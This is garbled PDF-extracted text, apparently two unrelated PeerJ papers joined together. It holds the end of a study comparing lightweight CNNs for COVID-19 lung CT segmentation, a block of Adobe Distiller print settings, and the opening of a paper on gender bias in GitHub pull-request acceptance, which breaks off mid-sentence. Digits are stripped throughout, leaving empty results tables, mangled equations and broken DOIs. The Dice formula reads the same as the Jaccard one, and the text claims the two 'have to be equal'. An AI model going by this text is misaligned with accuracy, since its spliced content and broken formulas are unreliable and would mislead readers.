segmentation (livne et al., ). while training the unet model, the cross-entropy loss function united with the last feature map and by applying a pixel-wise softmax over it, the softmax is denoted as: pk ¼ e ak xð Þð Þ pk k ¼ e ak xð Þ ( ) in addition, the energy function is calculated by: e ¼ x x � w xð Þ log pl xð Þ xð Þ � � ( ) where: ak: represents the activation in feature map k pk: represents estimated maximum function k: no. of class x �: pixel position pl xð Þ: deviation figure illustrating the architecture of u-net. full-size doi: . /peerj-cs. /fig- iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the training data set, to counterbalance the diverse frequency of pixels from a specific class the weight map is pre calculated for ground-truth segmentation, and enforcing the network to study the minor separation borders amid touching cells introduce by us. the morphological operation used to calculate separation borders, the weight map calculated using: w xð Þ ¼ wc xð Þ þ w :e � ðd xð Þþd xð ÞÞ s � � ( ) where: w: denotes the weight map d : distance upto border of nearest first cell d : distance upto border of nearest second cell vgg unet image segmentation, which is performed pixel wise is most preferable task in the field of computer vision. encoders-decoders when combined they form unet architectures, which are very famous for image segmentation in medical imaging and satellite images etc. the weights of the pre-trained models (like imagenet) are used to initialize the weights of the neural network (i.e., trained on large dataset) as it gives better performance major than those models, which are trained on small dataset from scratch. models accuracy is very important in some applications like traffic safety and medicine pre-trained encoder can enhance the architecture and performance of unet. applications like object detection, image classification and scene understanding have improved their performance after the introduction of convolutional neural network (cnn). nowadays, cnn has outperformed in several fields over human experts. image segmentation plays vital role in the field of medical imaging to enhance the diagnostic capabilities. fully connected network (fcn) is amongst the most popular state-of-the-art machine learning technique (long, shelhamer & darrell, ). segmentation accuracy attained by some advancement in fcn as compared to pascal voc (everingham et al., ) common approach on standard datasets unet consists of two paths named as contracting and and expansive. in the contracting path it captures the context whereas in expansive path it enables exact localization. the contracting path sticks with the design of a convolutional network with pooling operations, alternating convolution, gradually down sample feature channels and expanding many feature maps layer simultaneously, each stage in the expansive path composed of an up-sampling of the feature channel along with a convolution. the vggunet architecture is illustrated in fig. . the encoder for unet model is composed of successive (series) layers vgg family and denoted by vgg- (ai et al., ). vgg- consist of convolution layers each using rectified linear unit (relu) activation function, maxpooling operations each reduces feature channel by and the kernels size × is used for every convolutional layer (iglovikov & shvets, ). iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ common loss function that is, binary cross entropy can be used for classification problem where ŷi denotes the prediction, yi denotes the true value and m denotes the no. of samples h ¼ � m xm i¼ ðyi log ŷi þ � yið Þ log � ŷi � � Þ ( ) performance validation to validate the performance of the models presented above, sensitivity, specificity, jaccard index, dice coefficient, accuracy and precision are used. to measure the accuracy of the segmented image, accuracy and precision are used and to measure the quality of segmentation, sensitivity and specificity are used. the various performance measures are described below: accuracy and precision are used to calculate the accuracy of the segmentation model itself. accuracy is as the ratio of correct predictions to the total number of predictions and precision is defined as the ratio of correctly predicted positive observations to the total number of correctly predicted observations. accuracy ¼ tp þ tn tp þ tn þ fp þ fn ( ) precision ¼ tp tp þ fp ( ) figure illustrating encoder decoder architecture also known as vggunet. full-size doi: . /peerj-cs. /fig- iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the case of segmentation, accuracy and precision are used to measure the binary segmentation of each pixel of the image by the model. although precision and accuracy may seem to be enough to describe the performance of the model, other factors are also important to describe the quality of segmentation. sensitivity and specificity are used to measure the quality of segmentation between the classes. in this case, the models are performing binary segmentation. so, sensitivity, or the true positive rate, measures the quality of segmentation of one class and specificity, or the true negative rate, measures the quality of segmentation of the other class. sensitivity and specificity can be defined as: sensitivity ¼ tpðtp þ fnÞ ( ) specificity ¼ tnðtn þ fpÞ ( ) with sensitivity and specificity, having a high value for each is good as it shows that the model is able to segment the pixels correctly without any errors. the jaccard index and dice coefficient are used to quantify the similarity between the original image and the segmented image. jaccard index and dice coefficient are similar to the intersection over union (iou) used to evaluate object detection models. jaccard index and dice coefficient ranges from to where means no overlap and mean full similarity. jaccard index and dice coefficient can be defined as: dice coefficient ¼ tp tp þ fp þ fn ( ) jaccard index ¼ tp tp þ fp þ fn ( ) while the dice coefficient and the jaccard index are quite similar, ideally, the two measures have to be equal. so, to measure the quality of similarity of the model, a similarity between the dice coefficient and jaccard index can be viewed to measure the quality of segmentation. results and discussion the experiments were conducted in the google colab platform. as shown in table , hr net is shown to have the highest performance as compared to the other models. the second best model is the classical unet, the third best model is the vgg unet and the model with the worst performance is the seg net. the reason for the high performance of the hr net is the fact that the hr net extracts high resolution information and retains in throughout the segmentation process. this is due to the parallel networks that are able to maintain essential information. hr net indicates a high accuracy of segmentation with an accuracy of . and a specificity of . . the performance is also compared against heavy weight models that have more parameters and layers than the iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lightweight models. the weight size is also considerably larger. as per our study, lightweight models offer better performance as compared to heavy weight models in all evaluation metrics. especially in dice coefficient, accuracy and precision, the lightweight models like hr net and unet offer better performance than inception resnetv and resnet . segnet and vgg unet are comparable to the performance of the heavy weight models. figures and shows the various outputs obtained from the models which segmented the positive tested and negative tested image respectively. hr net shows the best segmentation performance while unet shows good performance too. unet is able to obtain a proper boundary similar to the test image. seg net has performed poorly to segment the image. neither has it obtained a boundary nor has it segmented the finer details properly. the vgg unet has segmented the image properly but not to the extent of hr net or unet. we can see that hr net has the best performance. with decreased area, the performance decreases which means that unet is the second best performance, vgg unet is the third best and seg net has the worst performance amongst the models. when we compare figs. and with tables and , we can review the performance of the models on covid positive and negative slices. on comparing hr net with resnet and inceptionresnetv , we can see that hr net shows comparable performance to the heavy weight models but still performs better in terms of performance metrics like jaccard index and dice coefficient. this disparity is especially seen in terms of accuracy. the specificity of hr net is also much higher than the heavy weight models. this can be attributed to the method in which hr net extracts the features. even though the numbers of layers are more, it still retains a smaller size than the heavy weight models without sacrificing on performance. the next best performer is unet as can be seen from the images. unet is able to segment the boundaries and consistencies of the slices but cannot maintain the shape in all the predictions. vgg unet and seg net perform the worst each with having their own disadvantages. vgg unet might be better at detecting finer details in the lungs but cannot maintain the basic predictive ability to detect boundaries and textures. seg net performs the worst as it cannot segment even the most basic boundary or details. since it is used more as a segmentation algorithm for land masses, this makes sense for seg net to perform badly in the case of lung ct slices. table performance measures of segmentation performed on four light weight and two heavy weight models mentioned. method fprate fnrate tprate = sensitivity tnrate = specificity jaccard dice accuracy precision hr_net . . . . . . . . seg_net . . . . . . . . unet . . . . . . . . vgg_unet . . . . . . . . inception resnet v . . . . . . . . resnet . . . . . . . . iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure is the glyph plot which is a visual representation of the performance metrics for each model. the glyph plot is a good way to directly compare the performance of various models through the use of polygons. we can see that hr net has the best performance. the six points are the performance measures namely sensitivity, specificity, precision, accuracy, jaccard index and dice coefficient. with decreased area, the performance decreases which means that unet is the second best performance, vgg unet is the third best and seg net has the worst performance amongst the models. as can be seen from table , hr-net has the highest number of layers at , with other models having less than layers. but, hr-net has similar parameters to vgg unet and an even lesser number of parameters than segnet. this is due to the architecture of the hr-net. it is able to extract deeper features than the other models while maintaining the overall file size and number of parameters. the reason for hr-net having the figure covid positive tested with all the four lightweight and two heavy weight models. (a) original image and predictions from (b) unet (c) seg net (d) vgg unet (e) hr net (f) resnet and (g) inception resnetv . full-size doi: . /peerj-cs. /fig- iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure covid negative tested with all the four lightweight and two heavy weight models. (a) original image and predictions from (b) unet (c) seg net (d) vgg unet (e) hr net (f) resnet and (g) inception resnetv . full-size doi: . /peerj-cs. /fig- table inference speed of the four light weight and two heavy weight models along with other parameters which affects the inference speed. name of model inference time (ms) number of layers number of params model size (mb) unet , , segnet , , vgg unet , , hr net , , inception resnet v , , resnet , , iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ highest performance is its architecture which makes it the best model to be used for fast inference. comparing the segnet, vgg unet and unet, segnet has the poorest inference speed at ms with the largest model size. it is therefore inferred that segnet is the worst model to use for the segmentation of covid- based on our study. vgg unet and unet have different metrics due to the fact that vgg unet is trained on the vgg- weights. it, therefore, takes far higher time to load on and produce an inference than unet. if hr-net cannot be used, vgg unet is the next best network for segmenting covid- . to check whether the performance of lightweight models is better than previous literature, we have checked the performance with “heavy-weight” models. heavy weight models can be classified as those models with more number of layers; parameters and weight file size in mega bytes (mb). the heavy weight models do not offer better performance than the lightweight models in terms of inference time. the heavy weight models are slower than the lightweight models in segmenting covid- from ct images and also, take up more memory space. while the inference time is faster than hr net, the number of parameters and model size does not allow the models to perform as well as the light weight models. conclusion in this article, we analyzed four models for segmenting covid- from lung ct images. with the growing number of cases worldwide, quick and accurate testing is needed. to solve this problem, we approached the problem by reviewing four lightweight models that do not take a long time for training or testing. first, we remove motion artifacts from figure glyph plot representing the performance of the models over the performance measures. (a) hr net; (b) seg net; (c) unet; (d) vgg unet (the points are the performance measures namely sensitivity, specificity, precision, accuracy, jaccard index and dice coe). full-size doi: . /peerj-cs. /fig- iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the tomographic images through thresholding and use the pre-processed images for training the models. the four models trained are seg net, unet, vgg unet and hr-net. we evaluate the models on their performance using accuracy, dice, jaccard index and precision. we also used specificity and sensitivity as secondary evaluation characteristics. the results obtained demonstrate that lightweight convolutional networks have high latent ability to segment covid- from ct images with hrnet being the best network out of the four models analyzed. our work can be used in real-time environments to deploy on low-power devices. low-power devices require less computation time and have many constraints. when we consider these constraints, then using our lightweight models is very efficient as the user can accurately segment covid- from ct images. this system can be used in the field where electricity is constrained and fast and accurate predictions are required. the proposed light weight model can be implemented a simpler hardware that requires less area and power requirements. due to the lower power usage, the prototype can be used as standalone systems in power constrained conditions but require accurate predictions. the results in this study can be improved by collecting more data from hospitals and clinics to improve the accuracy of the segmentation. we can also improve the work by changing the architecture of the proposed models to extract more features without increasing the inference time significantly. acknowledgements we would like to thank vit university for the nurturing environment as well as the exposure it provided for us to complete this project. we also would like to thank mosmeddata for the covid dataset which is used for this research work. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � tharun j. iyer performed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. � alex noel joseph raj conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � sushil ghildiyal performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � ruban nersisson analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data availability the following information was supplied regarding data availability: code and data are available at github: https://github.com/iyeronfyer/covid- - segmentation.git. references ai t, yang z, hou h, zhan c, chen c, lv w, tao q, sun z, xia l. . correlation of chest ct and rt-pcr testing in coronavirus disease (covid- ) in china: a report of cases. radiology ( ):e –e doi . /radiol. . badrinarayanan v, kendall a, cipolla r. . segnet: a deep convolutional encoder-decoder architecture for image segmentation. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . capizzi g, sciuto gl, napoli c, polap d, woźniak m. . small lung nodules detection based on fuzzy-logic and probabilistic neural network with bio-inspired reinforcement learning. ieee transactions on fuzzy systems ( ): – . chan jfw, yuan s, kok kh, to kkw, chu h, yang j, xing f, liu j, yip ccy, poon rws, tsoi hw. . a familial cluster of pneumonia associated with the novel coronavirus indicating person-to-person transmission: a study of a family cluster. lancet ( ): – doi . /s - ( ) - . chen x, yao l, zhang y. . residual attention u-net for automated multi-class segmentation of covid- chest ct images. available at http://arxiv.org/abs/ . . devarapalli rm, kalluri hk, dondeti v. . lung cancer detection of ct lung images. international journal of recent technology and engineering ( s ): – . everingham m, eslami sa, van gool l, williams ck, winn j, zisserman a. . the pascal visual object classes challenge: a retrospective. international journal of computer vision ( ): – doi . /s - - - . hamer ow, salzberger b, gebauer j, stroszczynski c, pfeifer m. . ct morphology of covid- : case report and review of literature. röfo - fortschritte auf dem gebiet der röntgenstrahlen und der bildgebenden verfahren ( ): – doi . /a- - . iglovikov v, shvets a. . ternausnet: u-net with vgg encoder pre-trained on imagenet for image segmentation. available at http://arxiv.org/abs/ . . jamshidi m, lalbakhsh a, talla j, peroutka z, hadjilooei f, lalbakhsh p, jamshidi m, la spada l, mirmozafari m, dehghani m, sabet a. . artificial intelligence and covid- : deep learning approaches for diagnosis and treatment. ieee access : – doi . /access. . . jun m, cheng g, yixin w, xingle a, jiantao g, ziqi y, jian h. . covid- ct lung and infection segmentation dataset (version . ) [data set]. zenodo. doi . /zenodo. . ke q, zhang j, wei w, połap d, woźniak m, kośmider l, damaševĭcius r. . a neuro- heuristic approach for recognition of lung diseases from x-ray images. expert systems with applications ( ): – doi . /j.eswa. . . . khan zf. . automated segmentation of lung parenchyma using colour based fuzzy c-means clustering. journal of electrical engineering & technology ( ): – doi . /s - - - . li y, xia l. . coronavirus disease (covid- ): role of chest ct in diagnosis and management. american journal of roentgenology ( ): – doi . /ajr. . . iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/iyeronfyer/covid- -segmentation.git https://github.com/iyeronfyer/covid- -segmentation.git http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /s - ( ) - http://arxiv.org/abs/ . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /a- - http://arxiv.org/abs/ . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /ajr. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ liu w, zhang q, chen j, xiang r, song h, shu s, chen l, liang l, zhou j, you l, wu p. . detection of covid- in children in early january in wuhan. china new england journal of medicine ( ): – doi . /nejmc . livne m, rieger j, aydin ou, taha aa, akay em, kossen t, madai vi. . a u-net deep learning framework for high performance vessel segmentation in patients with cerebrovascular disease. frontiers in neuroscience (feb): – doi . /fnins. . . long j, shelhamer e, darrell t. . fully convolutional networks for semantic segmentation. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . mannem r, ca v, ghosh pk. . a segnet based image enhancement technique for air-tissue boundary segmentation in real-time magnetic resonance imaging video. in: th national conference on communications, ncc . morozov sp, andreychenko ae, pavlov na, vladzymyrskyy av, ledikhova nv, gombolevskiy va, blokhin ia, gelezhe pb, gonchar av, chernina vy. . mosmeddata: chest ct scans with covid- related findings dataset. available at http://arxiv.org/abs/ . . ronneberger o, fischer p, brox t. . u-net: convolutional networks for biomedical image segmentation. lecture notes in computer science : – . sun k, xiao b, liu d, wang j. . deep high-resolution representation learning for human pose estimation. in: proceedings of the ieee computer society conference on computer vision and pattern recognition. piscataway: ieee, – . sun k, zhao y, jiang b, cheng t, xiao b, liu d, mu y, wang x, liu w, wang j. . high-resolution representations for labeling pixels and regions. available at http://arxiv.org/abs/ . . wieczorek m, siłka j, woźniak m. . neural network powered covid- spread forecasting model. chaos, solitons & fractals ( ): doi . /j.chaos. . . world health organization. . who director general’s remarks at the media briefing on -n cov on th february . available at https://www.who.int/dg/speeches/detail/who- director-general-s-remarks-at-the-media-briefing-on- -ncov-on- -february- . zhu n, zhang d, wang w, li x, yang b, song j, zhao x, huang b, shi w, lu r, niu p. . a novel coronavirus from patients with pneumonia in china, . new england journal of medicine ( ): – doi . /nejmoa . zu zy, jiang md, xu pp, chen w, ni qq, lu gm, zhang lj. . coronavirus disease (covid- ): a perspective from china. radiology ( ):e –e doi . /radiol. . iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /nejmc http://dx.doi.org/ . /fnins. . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . /j.chaos. . https://www.who.int/dg/speeches/detail/who-director-general-s-remarks-at-the-media-briefing-on- -ncov-on- -february- https://www.who.int/dg/speeches/detail/who-director-general-s-remarks-at-the-media-briefing-on- -ncov-on- -february- http://dx.doi.org/ . /nejmoa http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ performance analysis of lightweight cnn models to segment infectious lung tissues of covid- cases from tomographic images introduction materials and methods results and discussion conclusion flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice submitted august accepted march published may corresponding author emerson murphy-hill, emerson@csc.ncsu.edu academic editor arie van deursen additional information and declarations can be found on page doi . /peerj-cs. copyright terrell et al. distributed under creative commons cc-by . open access gender differences and bias in open source: pull request acceptance of women versus men josh terrell , andrew kofink , justin middleton , clarissa rainear , emerson murphy-hill , chris parnin and jon stallings department of computer science, california polytechnic state university—san luis obispo, san luis obispo, ca, united states department of computer science, north carolina state university, raleigh, nc, united states department of statistics, north carolina state university, raleigh, nc, united states abstract biases against women in the workplace have been documented in a variety of studies. this paper presents a large scale study on gender bias, where we compare acceptance rates of contributions from men versus women in an open source software community. surprisingly, our results show that women’s contributions tend to be accepted more often than men’s. however, for contributors who are outsiders to a project and their gender is identifiable, men’s acceptance rates are higher. our results suggest that although women on github may be more competent overall, bias against them exists nonetheless. subjects human-computer interaction, social computing, programming languages, software engineering keywords gender, bias, open source, software development, software engineering introduction in , a software developer named rachel nabors wrote about her experiences trying to fix bugs in open source software (http://rachelnabors.com/ / /of-github-and-pull- requests-and-comics/). nabors was surprised that all of her contributions were rejected by the project owners. a reader suggested that she was being discriminated against because of her gender. research suggests that, indeed, gender bias pervades open source. in nafus’ interviews with women in open source, she found that ‘‘sexist behavior is...as constant as it is extreme’’ (nafus, ). in vasilescu and colleagues’ study of stack overflow, a question and answer community for programmers, they found ‘‘a relatively ‘unhealthy’ community where women disengage sooner, although their activity levels are comparable to men’s’’ (vasilescu, capiluppi & serebrenik, ). these studies are especially troubling in light of recent research which suggests that diverse software development teams are more productive than homogeneous teams (vasilescu et al., ). nonetheless, in a survey of the more than open source developers who indicated a gender, only . % were women (arjona-reina, robles & dueas, ). how to cite this article terrell et al. ( ), gender differences and bias in open source: pull request acceptance of women versus men. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:emerson@csc.ncsu.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://rachelnabors.com/ / /of-github-and-pull-requests-and-comics/ http://rachelnabors.com/ / /of-github-and-pull-requests-and-comics/ http://dx.doi.org/ . /peerj-cs. figure github user ‘justinamiddleton’ makes a pull request; the repository owner ‘akofink’ accepts it by merging it. the changes proposed by justinamiddleton are now incorporated into the project. this article presents an investigation of gender bias in open source by studying how software developers respond to pull requests, proposed changes to a software project’s code, documentation, or other resources. a successfully accepted, or ‘merged,’ example is shown in fig. . we investigate whether pull requests are accepted at different rates for self-identified women compared to self-identified men. for brevity, we will call these developers ‘women’ and ‘men,’ respectively. our methodology is to analyze historical github data to evaluate whether pull requests from women are accepted less often. while other open source communities exist, we chose to study github because it is the largest (gousios et al., ), claiming to have over million collaborators across million software repositories (https://github.com/about/press). the main contribution of this paper is an examination of gender differences and bias in the open source software community, enabled by a novel gender linking technique that terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/about/press http://dx.doi.org/ . /peerj-cs. associates more than . million community members to self-reported genders. to our knowledge, this is the largest scale study of gender bias to date in open source communities. related work a substantial part of activity on github is done in a professional context, so studies of gender bias in the workplace are relevant. because we cannot summarize all such studies here, we instead turn to davison and burke’s meta-analysis of papers, each studying between and participants, finding that male and female job applicants generally received lower ratings for opposite-sex-type jobs (e.g., nurse is a female sex-typed job, whereas carpenter is male sex-typed) (davison & burke, ). the research described in davison and burke’s meta-analysis can be divided into experiments and field studies. experiments attempt to isolate the effect of gender bias by controlling for extrinsic factors, such as level of education. for example, knobloch- westerwick, glynn & huge ( ) asked scholars to read and evaluate research paper abstracts, then systematically varied the gender of each author; overall, scholars rated papers with male authors as having higher scientific quality. in contrast to experiments, field studies examine existing data to infer where gender bias may have occurred retrospectively. for example, roth and colleagues’ meta-analysis of such studies, encompassing , participants, found that while women tend to receive better job performance ratings than men, women also tend to be passed up for promotion (roth, purvis & bobko, ). experiments and retrospective field studies each have advantages. the advantage of experiments is that they can more confidently infer cause and effect by isolating gender as the predictor variable. the advantage of retrospective field studies is that they tend to have higher ecological validity because they are conducted in real-world situations. in this paper, we use a retrospective field study as a first step to quantify the effect of gender bias in open source. several other studies have investigated gender in the context of software development. burnett and colleagues ( ) analyzed gender differences in studies that surveyed or interviewed a total of , programmers; they found substantial differences in software feature usage, tinkering with and exploring features, and in self-efficacy. arun & arun ( ) surveyed indian software developers about their attitudes to understand gender roles and relations but did not investigate bias. drawing on survey data, graham and smith demonstrated that women in computer and math occupations generally earn only about % of what men earn (graham & smith, ). lagesen contrasts the cases of western versus malaysian enrollment in computer science classes, finding that differing rates of participation across genders results from opposing perspectives of whether computing is a ‘‘masculine’’ profession (lagesen, ). the present paper builds on this prior work by looking at a larger population of developers in the context of open source communities. some research has focused on differences in gender contribution in other kinds of virtual collaborative environments, particularly wikipedia. antin and colleagues ( ). followed the activity of contributors with self-identified genders on wikipedia and found that, of the most active users, men made more frequent contributions while women made larger contributions. terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. there are two gender studies about open source software development specifically. the first study is nafus’ anthropological mixed-methods study of open source contributors, which found that ‘‘men monopolize code authorship and simultaneously de-legitimize the kinds of social ties necessary to build mechanisms for women’s inclusion’’, meaning values such as politeness are favored less by men (nafus, ). the other is vasilescu and colleagues’ ( ) study of , github contributors, where they inferred the contributors’ gender based on their names and locations (and validated of those genders through a survey); they found that gender diversity is a significant and positive predictor of productivity. our work builds on this by investigating bias systematically and at a larger scale. general methodology our main research question was to what extent does gender bias exist when pull requests are judged on github? we answer this question from the perspective of a retrospective cohort study, a study of the differences between two groups previously exposed to a common factor to determine its influence on an outcome (doll, ). one example of a similar retrospective cohort study was krumholz and colleagues’ ( ). review of , medical records to determine whether there exists gender bias in the treatment of men and women for heart attacks. other examples include the analysis of , school discipline files to evaluate whether gender bias exists in the administration of corporal punishment (gilbert, williams & lundberg, ) and the analysis of , research articles to evaluate whether gender bias exists in the peer reviewing process for the journal of the american medical association (shaw & braden, ). to answer the research question, we examined whether men and women are equally likely to have their pull requests accepted on github, then investigated why differences might exist. while the data analysis techniques we used were specific to each approach, there were several commonalities in the data sets that we used, as we briefly explain below. for the sake of maximizing readability of this paper, we describe our methodology in detail in the ‘material and methods’ appendix. we started with a ghtorrent (gousios, ) dataset that contained public data on pull requests from june , to april , , as well as data about users and projects. we then augmented this ghtorrent data by mining github’s webpages for information about each pull request status, description, and comments. github does not request information about users’ genders. while previous approaches have used gender inference (vasilescu, capiluppi & serebrenik, ; vasilescu et al., ), we took a different approach—linking github accounts with social media profiles where the user has self-reported gender. specifically, we extract users’ email addresses from ghtorrent, look up that email address on the google+ social network, then, if that user has a profile, extract gender information from these users’ profiles. out of , , terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. github user profiles with email addresses, we were able to identify , , ( . %) of them as men or women through their public google+ profiles. we are the first to use this technique, to our knowledge. we recognize that our gender linking approach raises privacy concerns, which we have taken several steps to address. first, this research has undergone human subjects irb review, research that is based entirely on publicly available data. second, we have informed google about our approach in order to determine whether they believe our approach to 